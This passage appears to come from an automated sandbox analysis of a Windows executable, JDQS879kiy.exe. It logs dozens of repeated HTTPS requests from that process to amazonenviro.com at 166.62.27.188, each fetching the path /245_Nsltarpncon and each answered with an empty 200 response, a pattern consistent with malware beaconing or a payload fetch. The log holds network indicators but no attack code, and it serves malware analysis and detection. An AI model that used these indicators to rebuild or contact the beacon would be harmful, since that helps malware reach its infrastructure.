                      Host: amazonenviro.com
                      2025-01-14 07:24:34 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:34 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.7 | 49864 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:35 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:35 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:35 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.7 | 49874 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:36 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:37 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:37 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.7 | 49885 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:38 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:39 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:38 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      13          192.168.2.7  49897        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:40 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:40 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:40 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      14          192.168.2.7  49909        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:41 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:42 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:42 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      15          192.168.2.7  49921        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:43 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:44 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:43 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      16          192.168.2.7  49933        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:45 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:46 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:46 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      17          192.168.2.7  49945        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:47 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:47 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:47 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      18          192.168.2.7  49957        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:48 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:49 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:49 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      19          192.168.2.7  49969        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:50 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:51 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:51 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      20          192.168.2.7  49981        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:52 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:52 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:52 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      21          192.168.2.7  49994        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:53 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:54 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:54 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      22          192.168.2.7  50005        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:55 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:56 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:56 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      23          192.168.2.7  50017        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:57 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:57 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:57 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      24          192.168.2.7  50022        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:24:58 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:59 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:59 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      25          192.168.2.7  50024        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:00 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:01 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:00 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      26          192.168.2.7  50026        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:02 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:02 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:02 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      27          192.168.2.7  50028        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:03 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:04 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:04 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      28          192.168.2.7  50030        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:05 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:06 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:05 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      29          192.168.2.7  50032        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:07 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:07 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:07 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      30          192.168.2.7  50034        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:08 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:09 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:09 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      31          192.168.2.7  50037        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:10 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:10 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:10 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      32          192.168.2.7  50039        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:11 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:12 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:12 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      33          192.168.2.7  50041        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:13 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:14 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:13 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      34          192.168.2.7  50043        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:15 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:15 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:15 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      35          192.168.2.7  50045        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:16 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:17 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:17 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      36          192.168.2.7  50047        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:18 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:18 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:18 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      37          192.168.2.7  50049        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:20 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:20 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:20 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      38          192.168.2.7  50051        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:21 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:22 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:22 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      39          192.168.2.7  50053        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:23 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:23 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:23 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      40          192.168.2.7  50055        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:24 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:25 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:25 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      41          192.168.2.7  50057        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:26 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:27 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:26 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      42          192.168.2.7  50059        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:28 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:28 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:28 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      43          192.168.2.7  50061        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:29 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:30 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:30 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      44          192.168.2.7  50063        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:31 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:31 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:31 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      45          192.168.2.7  50065        166.62.27.188   443               7852  C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2025-01-14 07:25:32 UTC  165                OUT        GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:33 UTC  225                IN         HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:33 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
